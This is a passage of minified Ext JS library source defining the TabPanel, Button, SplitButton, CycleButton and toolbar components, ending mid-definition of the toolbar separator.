Ext.TabPanel = Ext.extend(Ext.Panel, {deferredRender:true, tabWidth:120, minTabWidth:30, resizeTabs:false, enableTabScroll:false, scrollIncrement:0, scrollRepeatInterval:400, scrollDuration:0.35, animScroll:true, tabPosition:"top", baseCls:"x-tab-panel", autoTabs:false, autoTabSelector:"div.x-tab", activeTab:undefined, tabMargin:2, plain:false, wheelIncrement:20, idDelimiter:"__", itemCls:"x-tab-item", elements:"body", headerAsText:false, frame:false, hideBorders:true, initComponent:function () {
this.frame = false;
Ext.TabPanel.superclass.initComponent.call(this);
this.addEvents("beforetabchange", "tabchange", "contextmenu");
this.setLayout(new Ext.layout.CardLayout(Ext.apply({layoutOnCardChange:this.layoutOnTabChange, deferredRender:this.deferredRender}, this.layoutConfig)));
if (this.tabPosition == "top") {
this.elements += ",header";
this.stripTarget = "header"
} else {
this.elements += ",footer";
this.stripTarget = "footer"
}
if (!this.stack) {
this.stack = Ext.TabPanel.AccessStack()
}
this.initItems()
}, onRender:function (c, a) {
Ext.TabPanel.superclass.onRender.call(this, c, a);
if (this.plain) {
var g = this.tabPosition == "top" ? "header" : "footer";
this[g].addClass("x-tab-panel-" + g + "-plain")
}
var b = this[this.stripTarget];
this.stripWrap = b.createChild({cls:"x-tab-strip-wrap", cn:{tag:"ul", cls:"x-tab-strip x-tab-strip-" + this.tabPosition}});
var e = (this.tabPosition == "bottom" ? this.stripWrap : null);
b.createChild({cls:"x-tab-strip-spacer"}, e);
this.strip = new Ext.Element(this.stripWrap.dom.firstChild);
this.edge = this.strip.createChild({tag:"li", cls:"x-tab-edge", cn:[
{tag:"span", cls:"x-tab-strip-text", cn:" "}
]});
this.strip.createChild({cls:"x-clear"});
this.body.addClass("x-tab-panel-body-" + this.tabPosition);
if (!this.itemTpl) {
var d = new Ext.Template('<li class="{cls}" id="{id}"><a class="x-tab-strip-close"></a>', '<a class="x-tab-right" href="#"><em class="x-tab-left">', '<span class="x-tab-strip-inner"><span class="x-tab-strip-text {iconCls}">{text}</span></span>', "</em></a></li>");
d.disableFormats = true;
d.compile();
Ext.TabPanel.prototype.itemTpl = d
}
this.items.each(this.initTab, this)
}, afterRender:function () {
Ext.TabPanel.superclass.afterRender.call(this);
if (this.autoTabs) {
this.readTabs(false)
}
if (this.activeTab !== undefined) {
var a = Ext.isObject(this.activeTab) ? this.activeTab : this.items.get(this.activeTab);
delete this.activeTab;
this.setActiveTab(a)
}
}, initEvents:function () {
Ext.TabPanel.superclass.initEvents.call(this);
this.mon(this.strip, {scope:this, mousedown:this.onStripMouseDown, contextmenu:this.onStripContextMenu});
if (this.enableTabScroll) {
this.mon(this.strip, "mousewheel", this.onWheel, this)
}
}, findTargets:function (c) {
var b = null, a = c.getTarget("li:not(.x-tab-edge)", this.strip);
if (a) {
b = this.getComponent(a.id.split(this.idDelimiter)[1]);
if (b.disabled) {
return{close:null, item:null, el:null}
}
}
return{close:c.getTarget(".x-tab-strip-close", this.strip), item:b, el:a}
}, onStripMouseDown:function (b) {
if (b.button !== 0) {
return
}
b.preventDefault();
var a = this.findTargets(b);
if (a.close) {
if (a.item.fireEvent("beforeclose", a.item) !== false) {
a.item.fireEvent("close", a.item);
this.remove(a.item)
}
return
}
if (a.item && a.item != this.activeTab) {
this.setActiveTab(a.item)
}
}, onStripContextMenu:function (b) {
b.preventDefault();
var a = this.findTargets(b);
if (a.item) {
this.fireEvent("contextmenu", this, a.item, b)
}
}, readTabs:function (d) {
if (d === true) {
this.items.each(function (h) {
this.remove(h)
}, this)
}
var c = this.el.query(this.autoTabSelector);
for (var b = 0, a = c.length; b < a; b++) {
var e = c[b], g = e.getAttribute("title");
e.removeAttribute("title");
this.add({title:g, contentEl:e})
}
}, initTab:function (d, b) {
var e = this.strip.dom.childNodes[b], g = this.getTemplateArgs(d), c = e ? this.itemTpl.insertBefore(e, g) : this.itemTpl.append(this.strip, g), a = "x-tab-strip-over", h = Ext.get(c);
h.hover(function () {
if (!d.disabled) {
h.addClass(a)
}
}, function () {
h.removeClass(a)
});
if (d.tabTip) {
h.child("span.x-tab-strip-text", true).qtip = d.tabTip
}
d.tabEl = c;
h.select("a").on("click", function (i) {
if (!i.getPageX()) {
this.onStripMouseDown(i)
}
}, this, {preventDefault:true});
d.on({scope:this, disable:this.onItemDisabled, enable:this.onItemEnabled, titlechange:this.onItemTitleChanged, iconchange:this.onItemIconChanged, beforeshow:this.onBeforeShowItem})
}, getTemplateArgs:function (b) {
var a = b.closable ? "x-tab-strip-closable" : "";
if (b.disabled) {
a += " x-item-disabled"
}
if (b.iconCls) {
a += " x-tab-with-icon"
}
if (b.tabCls) {
a += " " + b.tabCls
}
return{id:this.id + this.idDelimiter + b.getItemId(), text:b.title, cls:a, iconCls:b.iconCls || ""}
}, onAdd:function (b) {
Ext.TabPanel.superclass.onAdd.call(this, b);
if (this.rendered) {
var a = this.items;
this.initTab(b, a.indexOf(b));
this.delegateUpdates()
}
}, onBeforeAdd:function (b) {
var a = b.events ? (this.items.containsKey(b.getItemId()) ? b : null) : this.items.get(b);
if (a) {
this.setActiveTab(b);
return false
}
Ext.TabPanel.superclass.onBeforeAdd.apply(this, arguments);
var c = b.elements;
b.elements = c ? c.replace(",header", "") : c;
b.border = (b.border === true)
}, onRemove:function (d) {
var b = Ext.get(d.tabEl);
if (b) {
b.select("a").removeAllListeners();
Ext.destroy(b)
}
Ext.TabPanel.superclass.onRemove.call(this, d);
this.stack.remove(d);
delete d.tabEl;
d.un("disable", this.onItemDisabled, this);
d.un("enable", this.onItemEnabled, this);
d.un("titlechange", this.onItemTitleChanged, this);
d.un("iconchange", this.onItemIconChanged, this);
d.un("beforeshow", this.onBeforeShowItem, this);
if (d == this.activeTab) {
var a = this.stack.next();
if (a) {
this.setActiveTab(a)
} else {
if (this.items.getCount() > 0) {
this.setActiveTab(0)
} else {
this.setActiveTab(null)
}
}
}
if (!this.destroying) {
this.delegateUpdates()
}
}, onBeforeShowItem:function (a) {
if (a != this.activeTab) {
this.setActiveTab(a);
return false
}
}, onItemDisabled:function (b) {
var a = this.getTabEl(b);
if (a) {
Ext.fly(a).addClass("x-item-disabled")
}
this.stack.remove(b)
}, onItemEnabled:function (b) {
var a = this.getTabEl(b);
if (a) {
Ext.fly(a).removeClass("x-item-disabled")
}
}, onItemTitleChanged:function (b) {
var a = this.getTabEl(b);
if (a) {
Ext.fly(a).child("span.x-tab-strip-text", true).innerHTML = b.title
}
}, onItemIconChanged:function (d, a, c) {
var b = this.getTabEl(d);
if (b) {
b = Ext.get(b);
b.child("span.x-tab-strip-text").replaceClass(c, a);
b[Ext.isEmpty(a) ? "removeClass" : "addClass"]("x-tab-with-icon")
}
}, getTabEl:function (a) {
var b = this.getComponent(a);
return b ? b.tabEl : null
}, onResize:function () {
Ext.TabPanel.superclass.onResize.apply(this, arguments);
this.delegateUpdates()
}, beginUpdate:function () {
this.suspendUpdates = true
}, endUpdate:function () {
this.suspendUpdates = false;
this.delegateUpdates()
}, hideTabStripItem:function (b) {
b = this.getComponent(b);
var a = this.getTabEl(b);
if (a) {
a.style.display = "none";
this.delegateUpdates()
}
this.stack.remove(b)
}, unhideTabStripItem:function (b) {
b = this.getComponent(b);
var a = this.getTabEl(b);
if (a) {
a.style.display = "";
this.delegateUpdates()
}
}, delegateUpdates:function () {
var a = this.rendered;
if (this.suspendUpdates) {
return
}
if (this.resizeTabs && a) {
this.autoSizeTabs()
}
if (this.enableTabScroll && a) {
this.autoScrollTabs()
}
}, autoSizeTabs:function () {
var h = this.items.length, b = this.tabPosition != "bottom" ? "header" : "footer", c = this[b].dom.offsetWidth, a = this[b].dom.clientWidth;
if (!this.resizeTabs || h < 1 || !a) {
return
}
var k = Math.max(Math.min(Math.floor((a - 4) / h) - this.tabMargin, this.tabWidth), this.minTabWidth);
this.lastTabWidth = k;
var m = this.strip.query("li:not(.x-tab-edge)");
for (var e = 0, j = m.length; e < j; e++) {
var l = m[e], n = Ext.fly(l).child(".x-tab-strip-inner", true), g = l.offsetWidth, d = n.offsetWidth;
n.style.width = (k - (g - d)) + "px"
}
}, adjustBodyWidth:function (a) {
if (this.header) {
this.header.setWidth(a)
}
if (this.footer) {
this.footer.setWidth(a)
}
return a
}, setActiveTab:function (c) {
c = this.getComponent(c);
if (this.fireEvent("beforetabchange", this, c, this.activeTab) === false) {
return
}
if (!this.rendered) {
this.activeTab = c;
return
}
if (this.activeTab != c) {
if (this.activeTab) {
var a = this.getTabEl(this.activeTab);
if (a) {
Ext.fly(a).removeClass("x-tab-strip-active")
}
}
this.activeTab = c;
if (c) {
var b = this.getTabEl(c);
Ext.fly(b).addClass("x-tab-strip-active");
this.stack.add(c);
this.layout.setActiveItem(c);
this.delegateUpdates();
if (this.scrolling) {
this.scrollToTab(c, this.animScroll)
}
}
this.fireEvent("tabchange", this, c)
}
}, getActiveTab:function () {
return this.activeTab || null
}, getItem:function (a) {
return this.getComponent(a)
}, autoScrollTabs:function () {
this.pos = this.tabPosition == "bottom" ? this.footer : this.header;
var h = this.items.length, d = this.pos.dom.offsetWidth, c = this.pos.dom.clientWidth, g = this.stripWrap, e = g.dom, b = e.offsetWidth, i = this.getScrollPos(), a = this.edge.getOffsetsTo(this.stripWrap)[0] + i;
if (!this.enableTabScroll || b < 20) {
return
}
if (h == 0 || a <= c) {
e.scrollLeft = 0;
g.setWidth(c);
if (this.scrolling) {
this.scrolling = false;
this.pos.removeClass("x-tab-scrolling");
this.scrollLeft.hide();
this.scrollRight.hide();
if (Ext.isAir || Ext.isWebKit) {
e.style.marginLeft = "";
e.style.marginRight = ""
}
}
} else {
if (!this.scrolling) {
this.pos.addClass("x-tab-scrolling");
if (Ext.isAir || Ext.isWebKit) {
e.style.marginLeft = "18px";
e.style.marginRight = "18px"
}
}
c -= g.getMargins("lr");
g.setWidth(c > 20 ? c : 20);
if (!this.scrolling) {
if (!this.scrollLeft) {
this.createScrollers()
} else {
this.scrollLeft.show();
this.scrollRight.show()
}
}
this.scrolling = true;
if (i > (a - c)) {
e.scrollLeft = a - c
} else {
this.scrollToTab(this.activeTab, false)
}
this.updateScrollButtons()
}
}, createScrollers:function () {
this.pos.addClass("x-tab-scrolling-" + this.tabPosition);
var c = this.stripWrap.dom.offsetHeight;
var a = this.pos.insertFirst({cls:"x-tab-scroller-left"});
a.setHeight(c);
a.addClassOnOver("x-tab-scroller-left-over");
this.leftRepeater = new Ext.util.ClickRepeater(a, {interval:this.scrollRepeatInterval, handler:this.onScrollLeft, scope:this});
this.scrollLeft = a;
var b = this.pos.insertFirst({cls:"x-tab-scroller-right"});
b.setHeight(c);
b.addClassOnOver("x-tab-scroller-right-over");
this.rightRepeater = new Ext.util.ClickRepeater(b, {interval:this.scrollRepeatInterval, handler:this.onScrollRight, scope:this});
this.scrollRight = b
}, getScrollWidth:function () {
return this.edge.getOffsetsTo(this.stripWrap)[0] + this.getScrollPos()
}, getScrollPos:function () {
return parseInt(this.stripWrap.dom.scrollLeft, 10) || 0
}, getScrollArea:function () {
return parseInt(this.stripWrap.dom.clientWidth, 10) || 0
}, getScrollAnim:function () {
return{duration:this.scrollDuration, callback:this.updateScrollButtons, scope:this}
}, getScrollIncrement:function () {
return this.scrollIncrement || (this.resizeTabs ? this.lastTabWidth + 2 : 100)
}, scrollToTab:function (e, a) {
if (!e) {
return
}
var c = this.getTabEl(e), h = this.getScrollPos(), d = this.getScrollArea(), g = Ext.fly(c).getOffsetsTo(this.stripWrap)[0] + h, b = g + c.offsetWidth;
if (g < h) {
this.scrollTo(g, a)
} else {
if (b > (h + d)) {
this.scrollTo(b - d, a)
}
}
}, scrollTo:function (b, a) {
this.stripWrap.scrollTo("left", b, a ? this.getScrollAnim() : false);
if (!a) {
this.updateScrollButtons()
}
}, onWheel:function (g) {
var h = g.getWheelDelta() * this.wheelIncrement * -1;
g.stopEvent();
var i = this.getScrollPos(), c = i + h, a = this.getScrollWidth() - this.getScrollArea();
var b = Math.max(0, Math.min(a, c));
if (b != i) {
this.scrollTo(b, false)
}
}, onScrollRight:function () {
var a = this.getScrollWidth() - this.getScrollArea(), c = this.getScrollPos(), b = Math.min(a, c + this.getScrollIncrement());
if (b != c) {
this.scrollTo(b, this.animScroll)
}
}, onScrollLeft:function () {
var b = this.getScrollPos(), a = Math.max(0, b - this.getScrollIncrement());
if (a != b) {
this.scrollTo(a, this.animScroll)
}
}, updateScrollButtons:function () {
var a = this.getScrollPos();
this.scrollLeft[a === 0 ? "addClass" : "removeClass"]("x-tab-scroller-left-disabled");
this.scrollRight[a >= (this.getScrollWidth() - this.getScrollArea()) ? "addClass" : "removeClass"]("x-tab-scroller-right-disabled")
}, beforeDestroy:function () {
Ext.destroy(this.leftRepeater, this.rightRepeater);
this.deleteMembers("strip", "edge", "scrollLeft", "scrollRight", "stripWrap");
this.activeTab = null;
Ext.TabPanel.superclass.beforeDestroy.apply(this)
}});
Ext.reg("tabpanel", Ext.TabPanel);
Ext.TabPanel.prototype.activate = Ext.TabPanel.prototype.setActiveTab;
Ext.TabPanel.AccessStack = function () {
var a = [];
return{add:function (b) {
a.push(b);
if (a.length > 10) {
a.shift()
}
}, remove:function (e) {
var d = [];
for (var c = 0, b = a.length; c < b; c++) {
if (a[c] != e) {
d.push(a[c])
}
}
a = d
}, next:function () {
return a.pop()
}}
};
Ext.Button = Ext.extend(Ext.BoxComponent, {hidden:false, disabled:false, pressed:false, enableToggle:false, menuAlign:"tl-bl?", type:"button", menuClassTarget:"tr:nth(2)", clickEvent:"click", handleMouseEvents:true, tooltipType:"qtip", buttonSelector:"button:first-child", scale:"small", iconAlign:"left", arrowAlign:"right", initComponent:function () {
if (this.menu) {
if (Ext.isArray(this.menu)) {
this.menu = {items:this.menu}
}
if (Ext.isObject(this.menu)) {
this.menu.ownerCt = this
}
this.menu = Ext.menu.MenuMgr.get(this.menu);
this.menu.ownerCt = undefined
}
Ext.Button.superclass.initComponent.call(this);
this.addEvents("click", "toggle", "mouseover", "mouseout", "menushow", "menuhide", "menutriggerover", "menutriggerout");
if (Ext.isString(this.toggleGroup)) {
this.enableToggle = true
}
}, getTemplateArgs:function () {
return[this.type, "x-btn-" + this.scale + " x-btn-icon-" + this.scale + "-" + this.iconAlign, this.getMenuClass(), this.cls, this.id]
}, setButtonClass:function () {
if (this.useSetClass) {
if (!Ext.isEmpty(this.oldCls)) {
this.el.removeClass([this.oldCls, "x-btn-pressed"])
}
this.oldCls = (this.iconCls || this.icon) ? (this.text ? "x-btn-text-icon" : "x-btn-icon") : "x-btn-noicon";
this.el.addClass([this.oldCls, this.pressed ? "x-btn-pressed" : null])
}
}, getMenuClass:function () {
return this.menu ? (this.arrowAlign != "bottom" ? "x-btn-arrow" : "x-btn-arrow-bottom") : ""
}, onRender:function (c, a) {
if (!this.template) {
if (!Ext.Button.buttonTemplate) {
Ext.Button.buttonTemplate = new Ext.Template('<table id="{4}" cellspacing="0" class="x-btn {3}"><tbody class="{1}">', '<tr><td class="x-btn-tl"><i> </i></td><td class="x-btn-tc"></td><td class="x-btn-tr"><i> </i></td></tr>', '<tr><td class="x-btn-ml"><i> </i></td><td class="x-btn-mc"><em class="{2}" unselectable="on"><button type="{0}"></button></em></td><td class="x-btn-mr"><i> </i></td></tr>', '<tr><td class="x-btn-bl"><i> </i></td><td class="x-btn-bc"></td><td class="x-btn-br"><i> </i></td></tr>', "</tbody></table>");
Ext.Button.buttonTemplate.compile()
}
this.template = Ext.Button.buttonTemplate
}
var b, d = this.getTemplateArgs();
if (a) {
b = this.template.insertBefore(a, d, true)
} else {
b = this.template.append(c, d, true)
}
this.btnEl = b.child(this.buttonSelector);
this.mon(this.btnEl, {scope:this, focus:this.onFocus, blur:this.onBlur});
this.initButtonEl(b, this.btnEl);
Ext.ButtonToggleMgr.register(this)
}, initButtonEl:function (b, c) {
this.el = b;
this.setIcon(this.icon);
this.setText(this.text);
this.setIconClass(this.iconCls);
if (Ext.isDefined(this.tabIndex)) {
c.dom.tabIndex = this.tabIndex
}
if (this.tooltip) {
this.setTooltip(this.tooltip, true)
}
if (this.handleMouseEvents) {
this.mon(b, {scope:this, mouseover:this.onMouseOver, mousedown:this.onMouseDown})
}
if (this.menu) {
this.mon(this.menu, {scope:this, show:this.onMenuShow, hide:this.onMenuHide})
}
if (this.repeat) {
var a = new Ext.util.ClickRepeater(b, Ext.isObject(this.repeat) ? this.repeat : {});
this.mon(a, "click", this.onRepeatClick, this)
} else {
this.mon(b, this.clickEvent, this.onClick, this)
}
}, afterRender:function () {
Ext.Button.superclass.afterRender.call(this);
this.useSetClass = true;
this.setButtonClass();
this.doc = Ext.getDoc();
this.doAutoWidth()
}, setIconClass:function (a) {
this.iconCls = a;
if (this.el) {
this.btnEl.dom.className = "";
this.btnEl.addClass(["x-btn-text", a || ""]);
this.setButtonClass()
}
return this
}, setTooltip:function (b, a) {
if (this.rendered) {
if (!a) {
this.clearTip()
}
if (Ext.isObject(b)) {
Ext.QuickTips.register(Ext.apply({target:this.btnEl.id}, b));
this.tooltip = b
} else {
this.btnEl.dom[this.tooltipType] = b
}
} else {
this.tooltip = b
}
return this
}, clearTip:function () {
if (Ext.isObject(this.tooltip)) {
Ext.QuickTips.unregister(this.btnEl)
}
}, beforeDestroy:function () {
if (this.rendered) {
this.clearTip()
}
if (this.menu && this.destroyMenu !== false) {
Ext.destroy(this.btnEl, this.menu)
}
Ext.destroy(this.repeater)
}, onDestroy:function () {
if (this.rendered) {
this.doc.un("mouseover", this.monitorMouseOver, this);
this.doc.un("mouseup", this.onMouseUp, this);
delete this.doc;
delete this.btnEl;
Ext.ButtonToggleMgr.unregister(this)
}
Ext.Button.superclass.onDestroy.call(this)
}, doAutoWidth:function () {
if (this.autoWidth !== false && this.el && this.text && this.width === undefined) {
this.el.setWidth("auto");
if (Ext.isIE7 && Ext.isStrict) {
var a = this.btnEl;
if (a && a.getWidth() > 20) {
a.clip();
a.setWidth(Ext.util.TextMetrics.measure(a, this.text).width + a.getFrameWidth("lr"))
}
}
if (this.minWidth) {
if (this.el.getWidth() < this.minWidth) {
this.el.setWidth(this.minWidth)
}
}
}
}, setHandler:function (b, a) {
this.handler = b;
this.scope = a;
return this
}, setText:function (a) {
this.text = a;
if (this.el) {
this.btnEl.update(a || " ");
this.setButtonClass()
}
this.doAutoWidth();
return this
}, setIcon:function (a) {
this.icon = a;
if (this.el) {
this.btnEl.setStyle("background-image", a ? "url(" + a + ")" : "");
this.setButtonClass()
}
return this
}, getText:function () {
return this.text
}, toggle:function (b, a) {
b = b === undefined ? !this.pressed : !!b;
if (b != this.pressed) {
if (this.rendered) {
this.el[b ? "addClass" : "removeClass"]("x-btn-pressed")
}
this.pressed = b;
if (!a) {
this.fireEvent("toggle", this, b);
if (this.toggleHandler) {
this.toggleHandler.call(this.scope || this, this, b)
}
}
}
return this
}, onDisable:function () {
this.onDisableChange(true)
}, onEnable:function () {
this.onDisableChange(false)
}, onDisableChange:function (a) {
if (this.el) {
if (!Ext.isIE6 || !this.text) {
this.el[a ? "addClass" : "removeClass"](this.disabledClass)
}
this.el.dom.disabled = a
}
this.disabled = a
}, showMenu:function () {
if (this.rendered && this.menu) {
if (this.tooltip) {
Ext.QuickTips.getQuickTip().cancelShow(this.btnEl)
}
if (this.menu.isVisible()) {
this.menu.hide()
}
this.menu.ownerCt = this;
this.menu.show(this.el, this.menuAlign)
}
return this
}, hideMenu:function () {
if (this.hasVisibleMenu()) {
this.menu.hide()
}
return this
}, hasVisibleMenu:function () {
return this.menu && this.menu.ownerCt == this && this.menu.isVisible()
}, onRepeatClick:function (a, b) {
this.onClick(b)
}, onClick:function (a) {
if (a) {
a.preventDefault()
}
if (a.button !== 0) {
return
}
if (!this.disabled) {
this.doToggle();
if (this.menu && !this.hasVisibleMenu() && !this.ignoreNextClick) {
this.showMenu()
}
this.fireEvent("click", this, a);
if (this.handler) {
this.handler.call(this.scope || this, this, a)
}
}
}, doToggle:function () {
if (this.enableToggle && (this.allowDepress !== false || !this.pressed)) {
this.toggle()
}
}, isMenuTriggerOver:function (b, a) {
return this.menu && !a
}, isMenuTriggerOut:function (b, a) {
return this.menu && !a
}, onMouseOver:function (b) {
if (!this.disabled) {
var a = b.within(this.el, true);
if (!a) {
this.el.addClass("x-btn-over");
if (!this.monitoringMouseOver) {
this.doc.on("mouseover", this.monitorMouseOver, this);
this.monitoringMouseOver = true
}
this.fireEvent("mouseover", this, b)
}
if (this.isMenuTriggerOver(b, a)) {
this.fireEvent("menutriggerover", this, this.menu, b)
}
}
}, monitorMouseOver:function (a) {
if (a.target != this.el.dom && !a.within(this.el)) {
if (this.monitoringMouseOver) {
this.doc.un("mouseover", this.monitorMouseOver, this);
this.monitoringMouseOver = false
}
this.onMouseOut(a)
}
}, onMouseOut:function (b) {
var a = b.within(this.el) && b.target != this.el.dom;
this.el.removeClass("x-btn-over");
this.fireEvent("mouseout", this, b);
if (this.isMenuTriggerOut(b, a)) {
this.fireEvent("menutriggerout", this, this.menu, b)
}
}, focus:function () {
this.btnEl.focus()
}, blur:function () {
this.btnEl.blur()
}, onFocus:function (a) {
if (!this.disabled) {
this.el.addClass("x-btn-focus")
}
}, onBlur:function (a) {
this.el.removeClass("x-btn-focus")
}, getClickEl:function (b, a) {
return this.el
}, onMouseDown:function (a) {
if (!this.disabled && a.button === 0) {
this.getClickEl(a).addClass("x-btn-click");
this.doc.on("mouseup", this.onMouseUp, this)
}
}, onMouseUp:function (a) {
if (a.button === 0) {
this.getClickEl(a, true).removeClass("x-btn-click");
this.doc.un("mouseup", this.onMouseUp, this)
}
}, onMenuShow:function (a) {
if (this.menu.ownerCt == this) {
this.menu.ownerCt = this;
this.ignoreNextClick = 0;
this.el.addClass("x-btn-menu-active");
this.fireEvent("menushow", this, this.menu)
}
}, onMenuHide:function (a) {
if (this.menu.ownerCt == this) {
this.el.removeClass("x-btn-menu-active");
this.ignoreNextClick = this.restoreClick.defer(250, this);
this.fireEvent("menuhide", this, this.menu);
delete this.menu.ownerCt
}
}, restoreClick:function () {
this.ignoreNextClick = 0
}});
Ext.reg("button", Ext.Button);
Ext.ButtonToggleMgr = function () {
var a = {};
function b(e, j) {
if (j) {
var h = a[e.toggleGroup];
for (var d = 0, c = h.length; d < c; d++) {
if (h[d] != e) {
h[d].toggle(false)
}
}
}
}
return{register:function (c) {
if (!c.toggleGroup) {
return
}
var d = a[c.toggleGroup];
if (!d) {
d = a[c.toggleGroup] = []
}
d.push(c);
c.on("toggle", b)
}, unregister:function (c) {
if (!c.toggleGroup) {
return
}
var d = a[c.toggleGroup];
if (d) {
d.remove(c);
c.un("toggle", b)
}
}, getPressed:function (h) {
var e = a[h];
if (e) {
for (var d = 0, c = e.length; d < c; d++) {
if (e[d].pressed === true) {
return e[d]
}
}
}
return null
}}
}();
Ext.SplitButton = Ext.extend(Ext.Button, {arrowSelector:"em", split:true, initComponent:function () {
Ext.SplitButton.superclass.initComponent.call(this);
this.addEvents("arrowclick")
}, onRender:function () {
Ext.SplitButton.superclass.onRender.apply(this, arguments);
if (this.arrowTooltip) {
this.el.child(this.arrowSelector).dom[this.tooltipType] = this.arrowTooltip
}
}, setArrowHandler:function (b, a) {
this.arrowHandler = b;
this.scope = a
}, getMenuClass:function () {
return"x-btn-split" + (this.arrowAlign == "bottom" ? "-bottom" : "")
}, isClickOnArrow:function (c) {
if (this.arrowAlign != "bottom") {
var b = this.el.child("em.x-btn-split");
var a = b.getRegion().right - b.getPadding("r");
return c.getPageX() > a
} else {
return c.getPageY() > this.btnEl.getRegion().bottom
}
}, onClick:function (b, a) {
b.preventDefault();
if (!this.disabled) {
if (this.isClickOnArrow(b)) {
if (this.menu && !this.menu.isVisible() && !this.ignoreNextClick) {
this.showMenu()
}
this.fireEvent("arrowclick", this, b);
if (this.arrowHandler) {
this.arrowHandler.call(this.scope || this, this, b)
}
} else {
this.doToggle();
this.fireEvent("click", this, b);
if (this.handler) {
this.handler.call(this.scope || this, this, b)
}
}
}
}, isMenuTriggerOver:function (a) {
return this.menu && a.target.tagName == this.arrowSelector
}, isMenuTriggerOut:function (b, a) {
return this.menu && b.target.tagName != this.arrowSelector
}});
Ext.reg("splitbutton", Ext.SplitButton);
Ext.CycleButton = Ext.extend(Ext.SplitButton, {getItemText:function (a) {
if (a && this.showText === true) {
var b = "";
if (this.prependText) {
b += this.prependText
}
b += a.text;
return b
}
return undefined
}, setActiveItem:function (c, a) {
if (!Ext.isObject(c)) {
c = this.menu.getComponent(c)
}
if (c) {
if (!this.rendered) {
this.text = this.getItemText(c);
this.iconCls = c.iconCls
} else {
var b = this.getItemText(c);
if (b) {
this.setText(b)
}
this.setIconClass(c.iconCls)
}
this.activeItem = c;
if (!c.checked) {
c.setChecked(true, a)
}
if (this.forceIcon) {
this.setIconClass(this.forceIcon)
}
if (!a) {
this.fireEvent("change", this, c)
}
}
}, getActiveItem:function () {
return this.activeItem
}, initComponent:function () {
this.addEvents("change");
if (this.changeHandler) {
this.on("change", this.changeHandler, this.scope || this);
delete this.changeHandler
}
this.itemCount = this.items.length;
this.menu = {cls:"x-cycle-menu", items:[]};
var a = 0;
Ext.each(this.items, function (c, b) {
Ext.apply(c, {group:c.group || this.id, itemIndex:b, checkHandler:this.checkHandler, scope:this, checked:c.checked || false});
this.menu.items.push(c);
if (c.checked) {
a = b
}
}, this);
Ext.CycleButton.superclass.initComponent.call(this);
this.on("click", this.toggleSelected, this);
this.setActiveItem(a, true)
}, checkHandler:function (a, b) {
if (b) {
this.setActiveItem(a)
}
}, toggleSelected:function () {
var a = this.menu;
a.render();
if (!a.hasLayout) {
a.doLayout()
}
var d, b;
for (var c = 1; c < this.itemCount; c++) {
d = (this.activeItem.itemIndex + c) % this.itemCount;
b = a.items.itemAt(d);
if (!b.disabled) {
b.setChecked(true);
break
}
}
}});
Ext.reg("cycle", Ext.CycleButton);
Ext.Toolbar = function (a) {
if (Ext.isArray(a)) {
a = {items:a, layout:"toolbar"}
} else {
a = Ext.apply({layout:"toolbar"}, a);
if (a.buttons) {
a.items = a.buttons
}
}
Ext.Toolbar.superclass.constructor.call(this, a)
};
(function () {
var a = Ext.Toolbar;
Ext.extend(a, Ext.Container, {defaultType:"button", enableOverflow:false, trackMenus:true, internalDefaults:{removeMode:"container", hideParent:true}, toolbarCls:"x-toolbar", initComponent:function () {
a.superclass.initComponent.call(this);
this.addEvents("overflowchange")
}, onRender:function (c, b) {
if (!this.el) {
if (!this.autoCreate) {
this.autoCreate = {cls:this.toolbarCls + " x-small-editor"}
}
this.el = c.createChild(Ext.apply({id:this.id}, this.autoCreate), b);
Ext.Toolbar.superclass.onRender.apply(this, arguments)
}
}, lookupComponent:function (b) {
if (Ext.isString(b)) {
if (b == "-") {
b = new a.Separator()
} else {
if (b == " ") {
b = new a.Spacer()
} else {
if (b == "->") {
b = new a.Fill()
} else {
b = new a.TextItem(b)
}
}
}
this.applyDefaults(b)
} else {
if (b.isFormField || b.render) {
b = this.createComponent(b)
} else {
if (b.tag) {
b = new a.Item({autoEl:b})
} else {
if (b.tagName) {
b = new a.Item({el:b})
} else {
if (Ext.isObject(b)) {
b = b.xtype ? this.createComponent(b) : this.constructButton(b)
}
}
}
}
}
return b
}, applyDefaults:function (e) {
if (!Ext.isString(e)) {
e = Ext.Toolbar.superclass.applyDefaults.call(this, e);
var b = this.internalDefaults;
if (e.events) {
Ext.applyIf(e.initialConfig, b);
Ext.apply(e, b)
} else {
Ext.applyIf(e, b)
}
}
return e
}, addSeparator:function () {
return this.add(new a.Separator())
}, addSpacer:function () {
return this.add(new a.Spacer())
}, addFill:function () {
this.add(new a.Fill())
}, addElement:function (b) {
return this.addItem(new a.Item({el:b}))
}, addItem:function (b) {
return this.add.apply(this, arguments)
}, addButton:function (c) {
if (Ext.isArray(c)) {
var e = [];
for (var d = 0, b = c.length; d < b; d++) {
e.push(this.addButton(c[d]))
}
return e
}
return this.add(this.constructButton(c))
}, addText:function (b) {
return this.addItem(new a.TextItem(b))
}, addDom:function (b) {
return this.add(new a.Item({autoEl:b}))
}, addField:function (b) {
return this.add(b)
}, insertButton:function (c, g) {
if (Ext.isArray(g)) {
var e = [];
for (var d = 0, b = g.length; d < b; d++) {
e.push(this.insertButton(c + d, g[d]))
}
return e
}
return Ext.Toolbar.superclass.insert.call(this, c, g)
}, trackMenu:function (c, b) {
if (this.trackMenus && c.menu) {
var d = b ? "mun" : "mon";
this[d](c, "menutriggerover", this.onButtonTriggerOver, this);
this[d](c, "menushow", this.onButtonMenuShow, this);
this[d](c, "menuhide", this.onButtonMenuHide, this)
}
}, constructButton:function (d) {
var c = d.events ? d : this.createComponent(d, d.split ? "splitbutton" : this.defaultType);
return c
}, onAdd:function (b) {
Ext.Toolbar.superclass.onAdd.call(this);
this.trackMenu(b);
if (this.disabled) {
b.disable()
}
}, onRemove:function (b) {
Ext.Toolbar.superclass.onRemove.call(this);
if (b == this.activeMenuBtn) {
delete this.activeMenuBtn
}
this.trackMenu(b, true)
}, onDisable:function () {
this.items.each(function (b) {
if (b.disable) {
b.disable()
}
})
}, onEnable:function () {
this.items.each(function (b) {
if (b.enable) {
b.enable()
}
})
}, onButtonTriggerOver:function (b) {
if (this.activeMenuBtn && this.activeMenuBtn != b) {
this.activeMenuBtn.hideMenu();
b.showMenu();
this.activeMenuBtn = b
}
}, onButtonMenuShow:function (b) {
this.activeMenuBtn = b
}, onButtonMenuHide:function (b) {
delete this.activeMenuBtn
}});
Ext.reg("toolbar", Ext.Toolbar);
a.Item = Ext.extend(Ext.BoxComponent, {hideParent:true, enable:Ext.emptyFn, disable:Ext.emptyFn, focus:Ext.emptyFn});
Ext.reg("tbitem", a.Item);
a.Separator = Ext.extend(a.Item, {onRender:function (c, b) {
